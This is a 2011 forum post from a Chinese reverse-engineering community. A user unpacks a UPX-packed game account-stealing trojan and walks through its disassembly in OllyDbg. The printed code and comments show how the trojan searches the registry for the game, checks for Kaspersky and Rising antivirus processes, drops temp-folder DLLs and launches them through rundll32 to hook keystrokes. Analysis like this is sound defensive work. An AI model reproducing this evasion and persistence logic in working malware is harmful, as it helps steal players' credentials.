好友
阅读权限40
听众
最后登录1970-1-1
|
曹无咎
发表于 2011-2-13 21:45
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 是昔流芳 于 2011-2-14 12:02 编辑
用到的工具:OD,PEid
根据收到的样本,解压之后,首先用PEid查壳(这个是老习惯了),发现是UPX的壳,用esp定律搞定,到达OEP后,并没有着急单步分析,发现有很多参考函数和字符串,这样就可以给分析样本提供很大的帮助,据分析,这个样本应该是某游戏的盗号木马,后来在分析的时候发现了“zhuxian”的字符串,难道是“诛仙”?,再就是还有很多与注册表和部分杀软有关的字符串,大体了解之后,开始单步分析:
脱壳部分代码,我就不贴了,直接ESP定律就可(你懂的)
004016D0 81EC 38090000 sub esp,938 ; OEP
004016D6 53 push ebx
004016D7 55 push ebp
004016D8 56 push esi
004016D9 8B35 2C204000 mov esi,dword ptr ds:[40202C] ; kernel32.Sleep 开始就有sleep函数
004016DF 57 push edi
004016E0 68 88130000 push 1388 ; 睡眠5000ms
004016E5 FFD6 call esi
004016E7 6A 00 push 0
004016E9 68 50144000 push virus.00401450
004016EE FF15 C4204000 call dword ptr ds:[4020C4] ; 枚举桌面上的窗口
004016F4 68 DC050000 push 5DC
004016F9 FFD6 call esi
004016FB B9 00010000 mov ecx,100
00401700 33C0 xor eax,eax
00401702 8D7C24 44 lea edi,dword ptr ss:[esp+44]
00401706 F3:AB rep stos dword ptr es:[edi]
00401708 8D4424 44 lea eax,dword ptr ss:[esp+44]
0040170C 50 push eax
0040170D 68 98354000 push virus.00403598
00401712 68 70314000 push virus.00403170 ; ASCII "ZPWUpdatePack\DefaultIcon"
00401717 68 00000080 push 80000000 ; 看到这个,我估计这个应该是某个游戏的盗号木马
0040171C E8 BFFCFFFF call virus.004013E0 ;
这个call进去看看,发现时打开注册表,查找看看有没有ZPWUpdatePack\DefaultIcon这个注册表项(我没安装过这个游戏是没有这个注册表项的):
004013E0 51 push ecx
004013E1 8B4C24 0C mov ecx,dword ptr ss:[esp+C]
004013E5 8B5424 08 mov edx,dword ptr ss:[esp+8]
004013E9 8D4424 0C lea eax,dword ptr ss:[esp+C]
004013ED C74424 00 00040>mov dword ptr ss:[esp],400
004013F5 50 push eax
004013F6 68 19000200 push 20019
004013FB 6A 00 push 0
004013FD 51 push ecx
004013FE 52 push edx
004013FF FF15 04204000 call dword ptr ds:[402004] ; advapi32.RegOpenKeyExA
00401405 85C0 test eax,eax
00401407 75 3F jnz short virus.00401448
00401409 56 push esi
0040140A 8B7424 14 mov esi,dword ptr ss:[esp+14]
0040140E 68 98354000 push virus.00403598
00401413 56 push esi
00401414 FF15 64204000 call dword ptr ds:[402064] ; kernel32.lstrcmpiA
0040141A 8B4C24 18 mov ecx,dword ptr ss:[esp+18]
0040141E 85C0 test eax,eax
00401420 8D4424 04 lea eax,dword ptr ss:[esp+4]
00401424 50 push eax
00401425 51 push ecx
00401426 6A 00 push 0
00401428 6A 00 push 0
0040142A 75 04 jnz short virus.00401430
0040142C 6A 00 push 0
0040142E EB 01 jmp short virus.00401431
00401430 56 push esi
00401431 8B5424 24 mov edx,dword ptr ss:[esp+24]
00401435 52 push edx
00401436 FF15 00204000 call dword ptr ds:[402000] ; advapi32.RegQueryValueExA
0040143C 8B4424 10 mov eax,dword ptr ss:[esp+10]
00401440 50 push eax
00401441 FF15 08204000 call dword ptr ds:[402008] ; advapi32.RegCloseKey
00401447 5E pop esi
00401448 59 pop ecx
00401449 C3 retn
继续向下分析:
00401721 8B1D 58204000 mov ebx,dword ptr ds:[402058] ; kernel32.lstrlenA
00401727 83C4 10 add esp,10
0040172A 8D4C24 44 lea ecx,dword ptr ss:[esp+44]
0040172E 51 push ecx
0040172F FFD3 call ebx
00401731 8B35 B0204000 mov esi,dword ptr ds:[4020B0] ; msvcrt.strstr
00401737 8B2D 70204000 mov ebp,dword ptr ds:[402070] ; kernel32.lstrcatA
0040173D 85C0 test eax,eax
0040173F 7E 50 jle short virus.00401791 此处跳走。
00401741 8D5424 44 lea edx,dword ptr ss:[esp+44]
00401745 68 64314000 push virus.00403164 ; ASCII "patcher.exe"
0040174A 52 push edx
0040174B FFD6 call esi 从字符串中查找指定字符串的第一次出现,即patcher.exe
0040174D 83C4 08 add esp,8
00401750 8BF8 mov edi,eax
00401752 57 push edi
00401753 FFD3 call ebx
00401755 8BC8 mov ecx,eax
00401757 33C0 xor eax,eax
00401759 8BD1 mov edx,ecx
0040175B 68 58314000 push virus.00403158 ; ASCII "..\element\"
00401760 C1E9 02 shr ecx,2
00401763 F3:AB rep stos dword ptr es:[edi]
00401765 8BCA mov ecx,edx
00401767 83E1 03 and ecx,3
0040176A F3:AA rep stos byte ptr es:[edi]
0040176C 8D4424 48 lea eax,dword ptr ss:[esp+48]
00401770 50 push eax
00401771 FFD5 call ebp
00401773 8D4C24 44 lea ecx,dword ptr ss:[esp+44]
00401777 51 push ecx
00401778 E8 B3FDFFFF call virus.00401530
0040177D 83C4 04 add esp,4
00401780 85C0 test eax,eax
00401782 74 0D je short virus.00401791
00401784 8D5424 44 lea edx,dword ptr ss:[esp+44]
00401788 52 push edx
00401789 E8 32FAFFFF call virus.004011C0
0040178E 83C4 04 add esp,4
00401791 8D4424 14 lea eax,dword ptr ss:[esp+14]
00401795 C74424 18 00000>mov dword ptr ss:[esp+18],0
0040179D 50 push eax
0040179E 68 19000200 push 20019
004017A3 6A 00 push 0
004017A5 68 28314000 push virus.00403128 ; ASCII "Software\Microsoft\Windows\ShellNoRoam\MUICache"
"Software\Microsoft\Windows\ShellNoRoam\MUICache"这个注册表路径经百度得,是保存一堆运行过的可执行文件的绝对路径的缓存,由此可知,上面的键值没有找到,应该是换了种方法查找游戏是否存在。
004017AA 68 01000080 push 80000001
004017AF C74424 24 00010>mov dword ptr ss:[esp+24],100
004017B7 FF15 04204000 call dword ptr ds:[402004] ; advapi32.RegOpenKeyExA 打开上述的键值
004017BD 6A 00 push 0
004017BF 6A 00 push 0
004017C1 8B4424 1C mov eax,dword ptr ss:[esp+1C]
004017C5 6A 00 push 0
004017C7 8D4C24 1C lea ecx,dword ptr ss:[esp+1C]
004017CB 6A 00 push 0
004017CD 8D5424 54 lea edx,dword ptr ss:[esp+54]
004017D1 51 push ecx
004017D2 52 push edx
004017D3 6A 00 push 0
004017D5 50 push eax
004017D6 FF15 10204000 call dword ptr ds:[402010] ; advapi32.RegEnumValueA 开始枚举了。。。。应该是枚举是否有"ElementClient.exe"。。。。
004017DC 85C0 test eax,eax
004017DE 0F85 C1010000 jnz virus.004019A5
004017E4 8D4C24 44 lea ecx,dword ptr ss:[esp+44]
004017E8 68 14314000 push virus.00403114 ; ASCII "ElementClient.exe"
004017ED 51 push ecx
004017EE FFD6 call esi 这个call在前面说到过,是“ 从字符串中查找指定字符串的第一次出现”
004017F0 83C4 08 add esp,8
004017F3 85C0 test eax,eax
004017F5 74 44 je short virus.0040183B 没有找到,跳走了。。。。。
004017F7 8D5424 44 lea edx,dword ptr ss:[esp+44]
004017FB 68 14314000 push virus.00403114 ; ASCII "ElementClient.exe"
00401800 52 push edx
00401801 FFD6 call esi
00401803 83C4 08 add esp,8
00401806 8BF8 mov edi,eax
00401808 57 push edi
00401809 FFD3 call ebx
0040180B 8BC8 mov ecx,eax
0040180D 33C0 xor eax,eax
0040180F 8BD1 mov edx,ecx
00401811 C1E9 02 shr ecx,2
00401814 F3:AB rep stos dword ptr es:[edi]
00401816 8BCA mov ecx,edx
00401818 83E1 03 and ecx,3
0040181B F3:AA rep stos byte ptr es:[edi]
0040181D 8D4424 44 lea eax,dword ptr ss:[esp+44]
00401821 50 push eax
00401822 E8 09FDFFFF call virus.00401530
00401827 83C4 04 add esp,4
0040182A 85C0 test eax,eax
0040182C 74 0D je short virus.0040183B
0040182E 8D4C24 44 lea ecx,dword ptr ss:[esp+44]
00401832 51 push ecx
00401833 E8 88F9FFFF call virus.004011C0
00401838 83C4 04 add esp,4
0040183B 8D5424 44 lea edx,dword ptr ss:[esp+44]
0040183F 68 00314000 push virus.00403100 ; ASCII "elementclient.exe" 枚举小写字母的,哈哈,挺犀利的。。。
00401844 52 push edx
00401845 FFD6 call esi
00401847 83C4 08 add esp,8
0040184A 85C0 test eax,eax
0040184C 74 44 je short virus.00401892 又跳走。。。。。。。。。。。
0040184E 8D4424 44 lea eax,dword ptr ss:[esp+44]
00401852 68 00314000 push virus.00403100 ; ASCII "elementclient.exe"
00401857 50 push eax
00401858 FFD6 call esi
0040185A 83C4 08 add esp,8
0040185D 8BF8 mov edi,eax
0040185F 57 push edi
00401860 FFD3 call ebx
00401862 8BC8 mov ecx,eax
00401864 33C0 xor eax,eax
00401866 8BD1 mov edx,ecx
00401868 C1E9 02 shr ecx,2
0040186B F3:AB rep stos dword ptr es:[edi]
0040186D 8BCA mov ecx,edx
0040186F 83E1 03 and ecx,3
00401872 F3:AA rep stos byte ptr es:[edi]
00401874 8D4424 44 lea eax,dword ptr ss:[esp+44]
00401878 50 push eax
00401879 E8 B2FCFFFF call virus.00401530
0040187E 83C4 04 add esp,4
00401881 85C0 test eax,eax
00401883 74 0D je short virus.00401892
00401885 8D4C24 44 lea ecx,dword ptr ss:[esp+44]
00401889 51 push ecx
0040188A E8 31F9FFFF call virus.004011C0
0040188F 83C4 04 add esp,4
00401892 8D5424 44 lea edx,dword ptr ss:[esp+44]
00401896 68 64314000 push virus.00403164 ; ASCII "patcher.exe"
0040189B 52 push edx
0040189C FFD6 call esi 此处,同上
0040189E 83C4 08 add esp,8
004018A1 85C0 test eax,eax
004018A3 74 50 je short virus.004018F5 还是跳走!
004018A5 8D4424 44 lea eax,dword ptr ss:[esp+44]
004018A9 68 64314000 push virus.00403164 ; ASCII "patcher.exe"
004018AE 50 push eax
004018AF FFD6 call esi
004018B1 83C4 08 add esp,8
004018B4 8BF8 mov edi,eax
004018B6 57 push edi
004018B7 FFD3 call ebx
004018B9 8BC8 mov ecx,eax
004018BB 33C0 xor eax,eax
004018BD 8BD1 mov edx,ecx
004018BF 68 58314000 push virus.00403158 ; ASCII "..\element\"
004018C4 C1E9 02 shr ecx,2
004018C7 F3:AB rep stos dword ptr es:[edi]
004018C9 8BCA mov ecx,edx
004018CB 83E1 03 and ecx,3
004018CE F3:AA rep stos byte ptr es:[edi]
004018D0 8D4424 48 lea eax,dword ptr ss:[esp+48]
004018D4 50 push eax
004018D5 FFD5 call ebp
004018D7 8D4C24 44 lea ecx,dword ptr ss:[esp+44]
004018DB 51 push ecx
004018DC E8 4FFCFFFF call virus.00401530
004018E1 83C4 04 add esp,4
004018E4 85C0 test eax,eax
004018E6 74 0D je short virus.004018F5
004018E8 8D5424 44 lea edx,dword ptr ss:[esp+44]
004018EC 52 push edx
004018ED E8 CEF8FFFF call virus.004011C0
004018F2 83C4 04 add esp,4
004018F5 8D4424 44 lea eax,dword ptr ss:[esp+44]
004018F9 68 F0304000 push virus.004030F0 ; ASCII "Launcher.exe" 枚举大写的。。。。。
004018FE 50 push eax
004018FF FFD6 call esi
00401901 83C4 08 add esp,8
00401904 85C0 test eax,eax
00401906 74 50 je short virus.00401958 还是跳走。。。。。。。。
00401908 8D4C24 44 lea ecx,dword ptr ss:[esp+44]
0040190C 68 F0304000 push virus.004030F0 ; ASCII "Launcher.exe"
00401911 51 push ecx
00401912 FFD6 call esi
00401914 83C4 08 add esp,8
00401917 8BF8 mov edi,eax
00401919 57 push edi
0040191A FFD3 call ebx
0040191C 8BC8 mov ecx,eax
0040191E 33C0 xor eax,eax
00401920 8BD1 mov edx,ecx
00401922 68 58314000 push virus.00403158 ; ASCII "..\element\"
00401927 C1E9 02 shr ecx,2
0040192A F3:AB rep stos dword ptr es:[edi]
0040192C 8BCA mov ecx,edx
0040192E 83E1 03 and ecx,3
00401931 F3:AA rep stos byte ptr es:[edi]
00401933 8D4424 48 lea eax,dword ptr ss:[esp+48]
00401937 50 push eax
00401938 FFD5 call ebp
0040193A 8D4C24 44 lea ecx,dword ptr ss:[esp+44]
0040193E 51 push ecx
0040193F E8 ECFBFFFF call virus.00401530
00401944 83C4 04 add esp,4
00401947 85C0 test eax,eax
00401949 74 0D je short virus.00401958
0040194B 8D5424 44 lea edx,dword ptr ss:[esp+44]
0040194F 52 push edx
00401950 E8 6BF8FFFF call virus.004011C0
00401955 83C4 04 add esp,4
00401958 8B4424 10 mov eax,dword ptr ss:[esp+10]
0040195C 8B7C24 18 mov edi,dword ptr ss:[esp+18]
00401960 8B5424 14 mov edx,dword ptr ss:[esp+14]
00401964 8D4C24 44 lea ecx,dword ptr ss:[esp+44]
00401968 50 push eax
00401969 51 push ecx
0040196A 57 push edi
0040196B 52 push edx
0040196C FF15 0C204000 call dword ptr ds:[40200C] ; advapi32.RegEnumKeyA 使用RegEnumKeyEx进行枚举.
00401972 6A 00 push 0
00401974 6A 00 push 0
00401976 8B5424 1C mov edx,dword ptr ss:[esp+1C]
0040197A 6A 00 push 0
0040197C 8D4424 1C lea eax,dword ptr ss:[esp+1C]
00401980 6A 00 push 0
00401982 8D4C24 54 lea ecx,dword ptr ss:[esp+54]
00401986 47 inc edi
00401987 50 push eax
00401988 51 push ecx
00401989 57 push edi
0040198A 52 push edx
0040198B 897C24 38 mov dword ptr ss:[esp+38],edi
0040198F C74424 30 00010>mov dword ptr ss:[esp+30],100
00401997 FF15 10204000 call dword ptr ds:[402010] ; advapi32.RegEnumValueA
0040199D 85C0 test eax,eax
0040199F ^ 0F84 3FFEFFFF je virus.004017E4 此处向上跳转,即循环。。。。。
004019A5 68 E4304000 push virus.004030E4 ; ASCII "czxasdfgh" 枚举不到的话,创建互斥窗体“czxasdfgh”
004019AA 6A 00 push 0
004019AC 68 01001F00 push 1F0001
004019B1 FF15 54204000 call dword ptr ds:[402054] ; kernel32.OpenMutexA 互斥函数。。。。。
004019B7 85C0 test eax,eax
004019B9 0F85 B9010000 jnz virus.00401B78
004019BF 68 DC304000 push virus.004030DC ; ASCII "avp.exe" 卡巴斯基主程序
004019C4 E8 67F8FFFF call virus.00401230 这个call进行遍历进程,并查找卡巴进程,这个call里面的代码就不进去看了,呵呵。。。。
004019C9 83C4 04 add esp,4
004019CC 85C0 test eax,eax
004019CE 0F85 A4010000 jnz virus.00401B78
004019D4 68 D0304000 push virus.004030D0 ; ASCII "RavMonD.exe" 瑞星主程序 都没有找到,因为俺是裸奔滴。。。。。
004019D9 E8 52F8FFFF call virus.00401230 同理
004019DE 83C4 04 add esp,4
004019E1 85C0 test eax,eax
004019E3 0F85 8F010000 jnz virus.00401B78
004019E9 8B8424 4C090000 mov eax,dword ptr ss:[esp+94C]
004019F0 8B0D C4304000 mov ecx,dword ptr ds:[4030C4]
004019F6 8B15 C8304000 mov edx,dword ptr ds:[4030C8]
004019FC A3 8C354000 mov dword ptr ds:[40358C],eax
00401A01 A0 CC304000 mov al,byte ptr ds:[4030CC]
00401A06 894C24 1C mov dword ptr ss:[esp+1C],ecx
00401A0A 884424 24 mov byte ptr ss:[esp+24],al
00401A0E B9 00010000 mov ecx,100
00401A13 33C0 xor eax,eax
00401A15 8DBC24 48050000 lea edi,dword ptr ss:[esp+548]
00401A1C F3:AB rep stos dword ptr es:[edi] 在这里样本进程会结束掉!!!!!!!!只好重新来过
00401A1E 68 B8304000 push virus.004030B8 ; ASCII "hdllpath" dll的路径?看着像哈。。。
00401A23 895424 24 mov dword ptr ss:[esp+24],edx
00401A27 E8 D4F5FFFF call virus.00401000
00401A2C 8D8C24 4C050000 lea ecx,dword ptr ss:[esp+54C]
00401A33 51 push ecx
00401A34 E8 C7F5FFFF call virus.00401000
00401A39 83C4 08 add esp,8
00401A3C 8D9424 48050000 lea edx,dword ptr ss:[esp+548]
00401A43 52 push edx
00401A44 68 04010000 push 104
00401A49 FF15 24204000 call dword ptr ds:[402024] ; kernel32.GetTempPathA 获得临时文件夹的路径
00401A4F FF15 28204000 call dword ptr ds:[402028] ; kernel32.GetTickCount 操作系统启动到现在所经过(elapsed)的毫秒数
00401A55 8BD0 mov edx,eax
00401A57 B9 40000000 mov ecx,40
00401A5C 33C0 xor eax,eax
00401A5E 8DBC24 45040000 lea edi,dword ptr ss:[esp+445]
00401A65 C68424 44040000>mov byte ptr ss:[esp+444],0
00401A6D F3:AB rep stos dword ptr es:[edi]
00401A6F 66:AB stos word ptr es:[edi]
00401A71 AA stos byte ptr es:[edi]
00401A72 8D8424 44040000 lea eax,dword ptr ss:[esp+444]
00401A79 50 push eax
00401A7A 52 push edx
00401A7B E8 40FAFFFF call virus.004014C0 生成一个随机名字的dll,预计是与键盘HOOK有关的东东。。。。
由于我并没有安装此游戏,所以样本就这样结束了,貌似是在temp文件夹生成了一个随机dll文件!应该通过这个dll来hook键盘消息,来获取账号和密码。。。。
00401A80 83C4 08 add esp,8
00401A83 8D8C24 44040000 lea ecx,dword ptr ss:[esp+444]
00401A8A 8D9424 48050000 lea edx,dword ptr ss:[esp+548]
00401A91 51 push ecx
00401A92 52 push edx
00401A93 FFD5 call ebp
00401A95 8D8424 48050000 lea eax,dword ptr ss:[esp+548]
00401A9C 68 B0304000 push virus.004030B0 ; ASCII "z28.dll"
00401AA1 50 push eax
00401AA2 FFD5 call ebp
00401AA4 8D8C24 48050000 lea ecx,dword ptr ss:[esp+548]
00401AAB 51 push ecx
00401AAC 6A 6D push 6D
00401AAE E8 5DF5FFFF call virus.00401010 寻找资源。。。。
00401AB3 83C4 08 add esp,8
00401AB6 85C0 test eax,eax
00401AB8 0F84 BA000000 je virus.00401B78
00401ABE 8D9424 48050000 lea edx,dword ptr ss:[esp+548]
00401AC5 52 push edx
00401AC6 E8 25F6FFFF call virus.004010F0 生成kuser.dll的病毒文件。。。。
00401ACB 83C4 04 add esp,4
00401ACE 8D4424 1C lea eax,dword ptr ss:[esp+1C]
00401AD2 50 push eax
00401AD3 6A 04 push 4
00401AD5 6A 00 push 0
00401AD7 6A 04 push 4
00401AD9 6A 00 push 0
00401ADB 6A FF push -1
00401ADD FF15 50204000 call dword ptr ds:[402050] ; kernel32.CreateFileMappingA
00401AE3 6A 04 push 4
00401AE5 6A 00 push 0
00401AE7 8BD8 mov ebx,eax
00401AE9 6A 00 push 0
00401AEB 68 1F000F00 push 0F001F
00401AF0 53 push ebx
00401AF1 FF15 4C204000 call dword ptr ds:[40204C] ; kernel32.MapViewOfFile
00401AF7 8BE8 mov ebp,eax
00401AF9 FF15 48204000 call dword ptr ds:[402048] ; kernel32.GetCurrentThreadId
00401AFF 8D8C24 48050000 lea ecx,dword ptr ss:[esp+548]
00401B06 8945 00 mov dword ptr ss:[ebp],eax
00401B09 51 push ecx
00401B0A FF15 44204000 call dword ptr ds:[402044] ; kernel32.LoadLibraryA
00401B10 8BF0 mov esi,eax
00401B12 85F6 test esi,esi
00401B14 74 67 je short virus.00401B7D
00401B16 8B3D 40204000 mov edi,dword ptr ds:[402040] ; kernel32.GetProcAddress
00401B1C 68 A8304000 push virus.004030A8 ; ASCII "zhko"
00401B21 56 push esi
00401B22 FFD7 call edi
00401B24 68 A0304000 push virus.004030A0 ; ASCII "zhkf"
00401B29 56 push esi
00401B2A A3 90354000 mov dword ptr ds:[403590],eax
00401B2F FFD7 call edi
00401B31 A3 94354000 mov dword ptr ds:[403594],eax
00401B36 FF15 90354000 call dword ptr ds:[403590]
00401B3C 8B35 BC204000 mov esi,dword ptr ds:[4020BC] ; user32.GetMessageA
00401B42 6A 00 push 0
00401B44 6A 00 push 0
00401B46 8D5424 30 lea edx,dword ptr ss:[esp+30]
00401B4A 6A 00 push 0
00401B4C 52 push edx
00401B4D FFD6 call esi
00401B4F 85C0 test eax,eax
00401B51 74 11 je short virus.00401B64
00401B53 6A 00 push 0
00401B55 6A 00 push 0
00401B57 8D4424 30 lea eax,dword ptr ss:[esp+30]
00401B5B 6A 00 push 0
00401B5D 50 push eax
00401B5E FFD6 call esi
00401B60 85C0 test eax,eax
00401B62 ^ 75 EF jnz short virus.00401B53
00401B64 55 push ebp
00401B65 FF15 3C204000 call dword ptr ds:[40203C] ; kernel32.UnmapViewOfFile
00401B6B FF15 94354000 call dword ptr ds:[403594]
00401B71 53 push ebx
00401B72 FF15 A4204000 call dword ptr ds:[4020A4] ; kernel32.CloseHandle
00401B78 E8 43F7FFFF call virus.004012C0
00401B7D 5F pop edi
00401B7E 5E pop esi
00401B7F 5D pop ebp
00401B80 33C0 xor eax,eax
00401B82 5B pop ebx
00401B83 81C4 38090000 add esp,938
00401B89 C2 1000 retn 10
结束后,发下OD竟然不能用了,哎,重新载入后,又发现:
004012C0 81EC 10040000 sub esp,410
004012C6 53 push ebx
004012C7 56 push esi
004012C8 57 push edi
004012C9 33DB xor ebx,ebx
004012CB B9 40000000 mov ecx,40
004012D0 33C0 xor eax,eax
004012D2 8DBC24 15020000 lea edi,dword ptr ss:[esp+215]
004012D9 889C24 14020000 mov byte ptr ss:[esp+214],bl
004012E0 F3:AB rep stos dword ptr es:[edi]
004012E2 66:AB stos word ptr es:[edi]
004012E4 AA stos byte ptr es:[edi]
004012E5 8D8424 14020000 lea eax,dword ptr ss:[esp+214]
004012EC 68 04010000 push 104
004012F1 50 push eax
004012F2 53 push ebx
004012F3 FF15 78204000 call dword ptr ds:[402078] ; kernel32.GetModuleFileNameA
004012F9 B9 40000000 mov ecx,40
004012FE 33C0 xor eax,eax
00401300 8D7C24 0D lea edi,dword ptr ss:[esp+D]
00401304 885C24 0C mov byte ptr ss:[esp+C],bl
00401308 F3:AB rep stos dword ptr es:[edi]
0040130A 66:AB stos word ptr es:[edi]
0040130C 8D4C24 0C lea ecx,dword ptr ss:[esp+C]
00401310 51 push ecx
00401311 68 04010000 push 104
00401316 AA stos byte ptr es:[edi]
00401317 FF15 24204000 call dword ptr ds:[402024] ; kernel32.GetTempPathA
0040131D 8B35 70204000 mov esi,dword ptr ds:[402070] ; kernel32.lstrcatA
00401323 8D5424 0C lea edx,dword ptr ss:[esp+C]
00401327 68 84304000 push virus.00403084 ; ASCII "z28z.dll"
0040132C 52 push edx
0040132D FFD6 call esi
0040132F 8D4424 0C lea eax,dword ptr ss:[esp+C]
00401333 50 push eax
00401334 6A 6D push 6D
00401336 E8 D5FCFFFF call virus.00401010
0040133B B9 40000000 mov ecx,40
00401340 33C0 xor eax,eax
00401342 8DBC24 19010000 lea edi,dword ptr ss:[esp+119]
00401349 889C24 18010000 mov byte ptr ss:[esp+118],bl
00401350 F3:AB rep stos dword ptr es:[edi]
00401352 83C4 08 add esp,8
00401355 8D8C24 10010000 lea ecx,dword ptr ss:[esp+110]
0040135C 66:AB stos word ptr es:[edi]
0040135E 68 04010000 push 104
00401363 51 push ecx
00401364 AA stos byte ptr es:[edi]
00401365 FF15 20204000 call dword ptr ds:[402020] ; kernel32.GetSystemDirectoryA
0040136B 8D9424 10010000 lea edx,dword ptr ss:[esp+110]
00401372 68 74304000 push virus.00403074 ; ASCII "\rundll32.exe"
00401377 52 push edx
00401378 FFD6 call esi
0040137A B9 40000000 mov ecx,40
0040137F 33C0 xor eax,eax
00401381 8DBC24 19030000 lea edi,dword ptr ss:[esp+319]
00401388 889C24 18030000 mov byte ptr ss:[esp+318],bl
0040138F F3:AB rep stos dword ptr es:[edi]
00401391 66:AB stos word ptr es:[edi]
00401393 AA stos byte ptr es:[edi]
00401394 8D8424 14020000 lea eax,dword ptr ss:[esp+214]
0040139B 8D4C24 0C lea ecx,dword ptr ss:[esp+C]
0040139F 50 push eax
004013A0 68 64304000 push virus.00403064 ; ASCII "InstallService"
004013A5 8D9424 18010000 lea edx,dword ptr ss:[esp+118]
004013AC 51 push ecx
004013AD 52 push edx
004013AE 8D8424 28030000 lea eax,dword ptr ss:[esp+328]
004013B5 68 50304000 push virus.00403050 ; ASCII "cmd /c %s %s,%s %s"
004013BA 50 push eax
004013BB FF15 C8204000 call dword ptr ds:[4020C8] ; user32.wsprintfA
004013C1 83C4 18 add esp,18
004013C4 8D8C24 18030000 lea ecx,dword ptr ss:[esp+318]
004013CB 53 push ebx
004013CC 51 push ecx
004013CD FF15 1C204000 call dword ptr ds:[40201C] ; kernel32.WinExec
004013D3 53 push ebx
004013D4 FF15 18204000 call dword ptr ds:[402018] ; kernel32.ExitProcess
004013DA 5F pop edi
004013DB 5E pop esi
004013DC 5B pop ebx
004013DD 90 nop
004013DE 90 nop
004013DF 90 nop
004013E0 51 push ecx
004013E1 8B4C24 0C mov ecx,dword ptr ss:[esp+C]
004013E5 8B5424 08 mov edx,dword ptr ss:[esp+8]
004013E9 8D4424 0C lea eax,dword ptr ss:[esp+C]
004013ED C74424 00 00040>mov dword ptr ss:[esp],400
004013F5 50 push eax
004013F6 68 19000200 push 20019
004013FB 6A 00 push 0
004013FD 51 push ecx
004013FE 52 push edx
004013FF FF15 04204000 call dword ptr ds:[402004] ; advapi32.RegOpenKeyExA
00401405 85C0 test eax,eax
00401407 75 3F jnz short virus.00401448
00401409 56 push esi
0040140A 8B7424 14 mov esi,dword ptr ss:[esp+14]
0040140E 68 98354000 push virus.00403598
00401413 56 push esi
00401414 FF15 64204000 call dword ptr ds:[402064] ; kernel32.lstrcmpiA
0040141A 8B4C24 18 mov ecx,dword ptr ss:[esp+18]
0040141E 85C0 test eax,eax
00401420 8D4424 04 lea eax,dword ptr ss:[esp+4]
00401424 50 push eax
00401425 51 push ecx
00401426 6A 00 push 0
00401428 6A 00 push 0
0040142A 75 04 jnz short virus.00401430
0040142C 6A 00 push 0
0040142E EB 01 jmp short virus.00401431
00401430 56 push esi
00401431 8B5424 24 mov edx,dword ptr ss:[esp+24]
00401435 52 push edx
00401436 FF15 00204000 call dword ptr ds:[402000] ; advapi32.RegQueryValueExA
0040143C 8B4424 10 mov eax,dword ptr ss:[esp+10]
00401440 50 push eax
00401441 FF15 08204000 call dword ptr ds:[402008] ; advapi32.RegCloseKey
00401447 5E pop esi
00401448 59 pop ecx
00401449 C3 retn
并发现了“zhuxian”字符串,应该是一款叫诸仙的游戏的盗号木马。。。。
现在来总结一下,这个木马的主要活动:
首先打开注册表,查找ZPWZPWUpdatePack\DefaultIconUpdatePack\DefaultIcon这个键值,找不到的话,在到Software\Microsoft\Windows\ShellNoRoam\MUICache这里面去
遍历寻找ElementClient.exe,循环查找,如果没有的话,生成一个互斥窗体,然后检查有没有卡巴和瑞星这两款杀软,然后再临时文件夹temp下随机生成一个dll文件,用来hook键盘消息,获取账号和密码。
要是有这个游戏的话,应该会在temp目录下生成z28z.dll的文件,通过这个rundll32.exe加载运行!(应该还生成了一个ksuser.dll的文件,这个没有分析到,是翻代码的时候看到的,不好意思哈)。
额,分析木马确实是个力气活,好累。。
视频的话,我明天在做啦,妈妈催我睡觉了哈。。。。
|
免费评分
-
查看全部评分
|
[复制链接]
|
发表于 2011-2-13 22:43
发表于 2011-2-18 18:58
